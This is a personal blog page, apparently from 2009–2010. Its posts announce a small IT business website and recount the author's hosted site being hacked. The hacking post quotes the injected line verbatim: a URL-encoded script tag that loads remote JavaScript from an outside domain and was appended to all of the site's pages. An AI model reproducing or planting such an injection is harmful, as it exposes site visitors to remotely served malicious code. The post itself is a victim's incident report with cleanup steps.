10 Sep 2010 @ 3:58 PM 

I am so excited to announce that Poon IT Enterprise website (poon.my) has been completed. After completed one of the customers website, I have taken a few hours to install a new WordPress installation and search for a nice theme. The installation went smoothly and the entire website was completed within 2 hours.

For the time being, Poon IT Enterprise is offering 4 types of service i.e. Website Design, Web Application Development, Desktop Application Development and Open Source System Implementation.

Feel free to send me feedback on the new website design. You are also welcome to request for quotation and make appointment with me for on-site demonstration.

Posted By: Aeric
Last Edit: 10 Sep 2010 @ 03:58 PM

EmailPermalinkComments (0)
Tags
 16 Mar 2010 @ 11:51 PM 

Website revamp, coming soon…

however, I don’t have any ideas so far how it will looks like… 😉

Just stay tune!

Posted By: Aeric
Last Edit: 17 Mar 2010 @ 12:19 AM

EmailPermalinkComments (0)
Tags
Tags: ,
Categories: Cyberticles, Cyblog, Projects
 25 Mar 2009 @ 8:03 AM 

I can’t access my blog http://aeric.poon.my and open the demo page http://demo.poon.my so I submit a ticket to the hosting support. I got a reply and I have been told that there are vulnerability in my scripts. All my ASP.NET and PHP pages are appended with the following lines:

<script language=javascript src=http://%35%31%6F%66%2E%6E%65%74/img.gif></script>

Try open the link in browser will decoded into this link:

http://www.51of.net.com/img.gif

but this page is invalid.

Try to change the link to:

http://www.51of.net

The page redirect to an under-construction China WAP service website.

I hope this issue would not happen again.

Warning: Please do not open the red colour links above. Opening the links at your on risk if you insist to.

Updates:

I received reply from the hosting customer support, Dan that no virus infection has taken place. Dan said the company will have the server patched and advice me to take some prevention steps such as impose more complex password and restore my code.

Updates:

I found that not only php and aspx files become the victim but html pages (*.html and *.htm) and classic ASP file also couldn’t escape from the vulnerability. I have deleted some of the unused files and folder. Redownload WordPress and reupload all the files doesn’t help much. There are some files from older version are still exists in the folder. Others files for add-on theme and plug-ins are also infected. So I need to check every folder and subfolder and remove the last line for each of the files. This is such a crazy work to do. I have also changed the FTP password and SQL database password with a more stronger one. I really hope I would not need to do this again.

For your information, all the files affected by this injection has the code at the bottom of the page. If it is an html page, the line of code is appended after the closing </html> tag. However the modified date of these files have not changed. I wonder how the hacker is so smart to able to access the server to change the files… How he can upload something and gain permission to execute some kind of command…? Does he really able to guess my FTP password through some kind of Brute-Force techniques…? Or just a simple trick to post some hacker message in my blog using eval() javascript function…? and without leaving any track…? However this incident has given me an experience to secure my domain.

Posted By: Aeric
Last Edit: 26 Mar 2009 @ 11:45 PM

EmailPermalinkComments (2)
Tags

 Last 50 Posts
 Back
Change Theme...
  • Users » 2
  • Posts/Pages » 127
  • Comments » 198
Change Theme...
  • VoidVoid « Default
  • LifeLife
  • EarthEarth
  • WindWind
  • WaterWater
  • FireFire
  • LightLight